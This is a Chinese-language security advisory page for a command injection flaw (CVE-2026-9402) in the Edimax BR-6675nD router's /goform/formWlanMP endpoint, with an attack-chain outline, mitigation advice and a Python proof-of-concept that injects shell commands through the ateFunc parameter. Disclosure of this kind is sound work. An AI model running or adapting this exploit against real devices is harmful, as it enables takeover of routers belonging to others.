CVE-2026-9402 CVSS 6.3 中危

CVE-2026-9402: Edimax路由器命令注入漏洞

披露日期: 2026-05-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9402

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Edimax BR-6675nD

漏洞概述

Edimax BR-6675nD 路由器 1.12 版本存在命令注入漏洞。该漏洞位于 /goform/formWlanMP 接口的 POST 处理函数中。由于未对用户输入进行严格过滤，攻击者可通过操纵多个参数注入恶意命令。该漏洞允许远程攻击者在低权限下执行任意系统命令，导致设备被完全控制。目前厂商尚未发布修复补丁。

技术细节

漏洞发生在 Edimax BR-6675nD 固件的 Web 服务器组件中，具体涉及文件 /goform/formWlanMP 下的 formWlanMP 函数。该函数负责处理来自 Web 界面的 POST 请求，并将参数传递给后台服务。在处理 ateFunc、ateGain 等数十个参数时，程序直接将用户可控的数据拼接至系统命令字符串中，并调用 system() 等函数执行，缺乏任何安全校验机制。攻击者只需发送包含特定 Shell 元字符（如 ; 或 &&）的 HTTP POST 数据包，即可绕过认证限制，在目标设备上执行任意 Shell 命令，从而接管整个路由器系统。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别出 Edimax BR-6675nD 设备及其固件版本。

STEP 2

访问

攻击者访问设备的 Web 管理接口，定位到存在漏洞的 /goform/formWlanMP 端点。

STEP 3

利用

攻击者构造恶意的 HTTP POST 请求，在 ateFunc 等参数中注入命令分隔符和恶意系统命令。

STEP 4

执行

服务器端未过滤输入，直接将参数传递给系统调用，导致恶意命令在设备上以 Root 权限执行。

STEP 5

控制

攻击者获得设备 Shell 访问权限，可进一步植入后门、窃取数据或发动横向攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip):
    # Exploit target URL
    url = f"http://{target_ip}/goform/formWlanMP"
    
    # Malicious payload to execute (e.g., create a file or reverse shell)
    # Injecting via the 'ateFunc' parameter
    payload = "; touch /tmp/pwned"
    
    # Construct POST data
    data = {
        "ateFunc": payload,
        "ateGain": "0",
        "ateRate": "0",
        "ateChan": "1"
    }
    
    try:
        print(f"[*] Sending payload to {target_ip}...")
        response = requests.post(url, data=data, timeout=5)
        if response.status_code == 200:
            print("[+] Payload sent successfully!")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "192.168.1.1" # Replace with actual target IP
    exploit(target)

影响范围

Edimax BR-6675nD 1.12

防御指南

临时缓解措施

在官方补丁发布前，建议用户禁用路由器的远程管理功能，并将设备置于防火墙后。如果不需要，可以临时关闭 Web 管理服务。同时，应密切监控设备的系统日志和网络流量，以检测是否存在异常的命令执行行为或外连连接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表